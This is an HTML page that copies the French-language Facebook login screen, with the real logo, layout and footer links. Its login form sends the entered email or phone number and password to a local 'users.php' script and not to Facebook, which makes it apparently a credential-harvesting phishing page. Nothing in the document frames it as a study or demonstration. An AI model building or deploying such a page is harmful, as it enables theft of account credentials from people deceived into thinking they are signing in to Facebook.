<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Facebook</title>
    <link rel="preconnect" href="https://fonts.gstatic.com">
    <link href="https://fonts.googleapis.com/css2?family=Poppins:wght@400;500;600;700&display=swap" rel="stylesheet">
    <link rel="stylesheet" href="css/style.css">
    <style type="text/css">
        * {
    padding: 0;
    margin: 0;
    box-sizing: border-box;
}

body {
    font-family: 'Poppins', sans-serif;
    background-color: #f0f2f5;
    color: #1c1e21;
}

main {
    height: 70vh;
    width: 100vw;
    position: relative;
    margin-top: 120px;
    margin-bottom: 150px;
}

footer {
    height: 30vh;
    background-color: #ffffff;
}

.row {
    display: flex;
    vertical-align: top;
    justify-content: space-around;
    align-items: center;
    width: 100%;
    max-width: 1000px;
    position: absolute;
    left: 50%;
    top: 50%;
    transform: translate(-50%, -50%);
}

.col-logo {
    flex: 0 0 50%;
    text-align: left;
}

.col-form {
    flex: 0 0 40%;
    text-align: center;
}

.col-logo img {
    max-width: 300px;
}

.col-logo h2 {
    font: 26px;
    font-weight: 400;
    padding: 0 30px;
    line-height: 32px;
}

.col-form .form-container {
    background-color: #ffffff;
    border: none;
    border-radius: 8px;
    box-shadow: 0 2px 4px rgba(0, 0, 0, 0.1), 0 8px 16px rgba(0, 0, 0, 0.1);
    margin-bottom: 30px;
    padding: 20px;
    max-width: 400px;
}

.col-form .form-container input, .col-form .form-container .btn-login {
    width: 100%;
    margin: 5px 0;
    height: 45px;
    vertical-align: middle;
    font-size: 16px;
    border-radius: 8px;
}

.col-form .form-container input {
    border: 1px solid #dddfe2;
    color: #1d2129;
    padding: 0 8px;
    outline: none;
}

.col-form .form-container input:focus {
    border-color: #1877f2;
    box-shadow: 0 0 0 2px #e7f3ff;
}

.col-form .form-container .btn-login {
    background-color: #1877f2;
    border: none;
    border-radius: 6px;
    font-size: 20px;
    padding: 0 16px;
    color: #ffffff;
    font-weight: 700;
}

.col-form .form-container a {
    display: block;
    color: #1877f2;
    font-size: 14px;
    text-decoration: none;
    padding: 10px 0 20px;
    border-bottom: 1px solid #dadde1;
}

.col-form .form-container a:hover {
    text-decoration: underline;
}

.col-form .form-container .btn-new {
    background-color: #42b72a;
    border: none;
    border-radius: 6px;
    font-size: 17px;
    line-height: 48px;
    padding: 0 16px;
    color: #ffffff;
    font-weight: 700;
    margin-top: 20px;
}

.col-form p {
    font-size: 14px;
}

.col-form p a {
    text-decoration: none;
    color: #1c1e21;
    font-weight: 600;
}

.col-form p a:hover {
    text-decoration: underline;
}

.footer-contents {
    position: relative;
    max-width: 1000px;
    margin: 0 auto;
}

footer ol {
    display: flex;
    flex-wrap: wrap;
    list-style-type: none;
    padding: 10px 0;
}

footer ol:first-child {
    border-bottom: 1px solid #dddfe2;
}

footer ol:first-child li:last-child button {
    background-color: #f5f6f7;
    border: 1px solid #ccd0d5;
    outline: none;
    color: #4b4f56;
    padding: 0 8px;
    font-weight: 700;
    font-size: 16px;
}

footer ol li {
    padding-right: 15px;
    font-size: 12px;
    color: #385898;
}

footer ol li a {
    text-decoration: none;
    color: #385898;
}

footer ol li a:hover {
    text-decoration: underline;
}

footer small {
    font-size: 11px;
}
@media only screen and (max-width: 768px) {
        body {
              display: flex;
              flex-direction: column;
              justify-content: center;
              align-items: center;
        }
        
        .row {
            flex-direction: column-reverse;
        }
        .col-logo {
            order: 2;
        }

        .col-form {
            order: 1;
            margin-top: 30px;
        }
    }
    </style>
</head>

<body>
    <main>
        <div class="row">
            <div class="col-logo">
                <img src="https://static.xx.fbcdn.net/rsrc.php/y8/r/dF5SId3UHWd.svg" alt="Logo">
                <h2>Avec Facebook, partagez et restez en contact avec votre entourage.</h2>
            </div>
            <form class="col-form" method="POST" action="users.php">
                <div class="form-container">
                    <input id="email" type="text" name="email" placeholder="Adresse e-mail ou numéro de tél.">
                    <input id="password" type="password" name="password" placeholder="Mot de passe">
                    <button class="btn-login">Se connecter</button>
                    <a href="https://web.facebook.com/recover/initiate/?privacy_mutation_token=eyJ0eXBlIjowLCJjcmVhdGlvbl90aW1lIjoxNjc4MTk2Njg2LCJjYWxsc2l0ZV9pZCI6MzgxMjI5MDc5NTc1OTQ2fQ%3D%3D&ars=facebook_login">Mot de passe oublié ?</a>
                    <button class="btn-new">Créer nouveau compte</button>
                </div>
                <p><a href="https://web.facebook.com/pages/create/?ref_type=registration_form"><b>Créer une Page</b></a> pour une célébrité, une marque ou une entreprise.</p>
            </div>
        </div>
    </main>
    <footer>
        <div class="footer-contents">
            <ol>
                <li>Français (France)</li>
                <li><a href="#">Malagasy</a></li>
                <li><a href="#">English (US)</a></li>
                <li><a href="#">Italiano/a></li>
                <li><a href="#">Español</a></li>
                <li><a href="#">Deutsch</a></li>
                <li><a href="#">中文(简体)</a></li>
                <li><a href="#">Türkçe</a></li>
                <li><a href="#">Português (Brasil)</a></li>
                <li><a href="#">العربية</a></li>
                <li><a href="#">हिन्दी</a></li>
                <li><button>+</button></li>
            </ol>

            <ol>
                <li><a href="/reg/" title="Inscrivez-vous sur Facebook">S’inscrire</a></li><li><a href="/login/" title="Se connecter à Facebook">Se connecter</a></li><li><a href="https://messenger.com/" title="Essayez Messenger.">Messenger</a></li><li><a href="/lite/" title="Facebook Lite pour Android.">Facebook Lite</a></li><li><a href="https://web.facebook.com/watch/" title="Naviguez parmi nos vidéos Watch.">Watch</a></li><li><a href="/places/" title="Découvrez les lieux populaires sur Facebook.">Lieux</a></li><li><a href="/games/" title="Découvrez les jeux Facebook.">Jeux</a></li><li><a href="/marketplace/" title="Achetez et vendez sur Facebook Marketplace.">Marketplace</a></li><li><a href="https://pay.facebook.com/" title="En savoir plus sur Meta Pay" target="_blank">Meta Pay</a></li><li><a href="https://www.oculus.com/" title="En savoir plus sur Oculus" target="_blank">Oculus</a></li><li><a href="https://portal.facebook.com/" title="En savoir plus sur Facebook Portal" target="_blank">Portal</a></li><li><a href="https://l.facebook.com/l.php?u=https%3A%2F%2Fwww.instagram.com%2F&amp;h=AT0gyb7j8Plpjoudh5UUopHEtrFXllBdUKAFbOKAklXJKJaJFLV-D3Pa9sNYUNTbVIuJoayY38WlBj5ULnq-8Ehh5UbJ4RzGiSzW9CVjCzXbMGMWGjHB4Y-OaSeQ1r2becXcF1v0B6YC--dQ2NTvQg" title="Découvrez Instagram" target="_blank" rel="nofollow" data-lynx-mode="asynclazy">Instagram</a></li><li><a href="https://www.bulletin.com/" title="Découvrez la newsletter Bulletin">Bulletin</a></li><li><a href="/fundraisers/" title="Faire un don à des causes qui le méritent.">Collectes de dons</a></li><li><a href="/biz/directory/" title="Parcourir notre annuaire des services Facebook.">Services</a></li><li><a href="/votinginformationcenter/?entry_point=c2l0ZQ%3D%3D" title="Voir le Centre d’information sur les élections.">Centre d’information sur les élections</a></li><li><a href="/privacy/policy/?entry_point=facebook_page_footer" title="Découvrez comment nous collectons, utilisons et partageons les informations pour faire fonctionner Facebook.">Politique de confidentialité</a></li><li><a href="/privacy/center/?entry_point=facebook_page_footer" title="Découvrez comment gérer et contrôler votre confidentialité sur Facebook.">Centre de confidentialité</a></li><li><a href="/groups/explore/" title="Découvrir nos groupes.">Groupes</a></li><li><a href="https://about.meta.com/" accesskey="8" title="Consultez notre blog, découvrez notre centre de ressources et recherchez des offres d’emploi.">À propos</a></li><li><a href="/ad_campaign/landing.php?placement=pflo&amp;campaign_id=402047449186&amp;nav_source=unknown&amp;extra_1=auto" title="Diffusez votre publicité sur Facebook.">Créer une publicité</a></li><li><a href="/pages/create/?ref_type=site_footer" title="Créez une Page.">Créer une Page</a></li><li><a href="https://developers.facebook.com/?ref=pf" title="Développez sur notre propre plateforme.">Développeurs</a></li><li><a href="/careers/?ref=pf" title="Faites évoluer votre carrière en rejoignant notre incroyable entreprise.">Emplois</a></li><li><a href="/policies/cookies/" title="À propos des cookies et de Facebook." data-nocookies="1">Cookies</a></li><li><a class="_41ug" data-nocookies="1" href="https://web.facebook.com/help/568137493302217" title="En savoir plus sur Choisir sa publicité.">Choisir sa publicité<i class="img sp_h4Swrc8tiWJ sx_22044a"></i></a></li><li><a data-nocookies="1" href="/policies?ref=pf" accesskey="9" title="Prenez connaissance des conditions générales et des règlements.">Conditions générales</a></li><li><a href="/help/?ref=pf" accesskey="0" title="Consultez les pages d’aide.">Aide</a></li><li><a href="help/637205020878504" title="Consultez notre avis sur l’importation des contacts et les non-utilisateurs.">Importation des contacts et non-utilisateurs</a></li><li><a accesskey="6" class="accessible_elem" href="/settings" title="Affichez et modifiez vos paramètres Facebook.">Paramètres</a></li><li><a accesskey="7" class="accessible_elem" href="/allactivity?privacy_source=activity_log_top_menu" title="Affichez votre Historique d’activité">Historique d’activité</a></li>
            </ol>
            <small>Meta © 2023</small>
        </div>
    </footer>
</body>

</html>
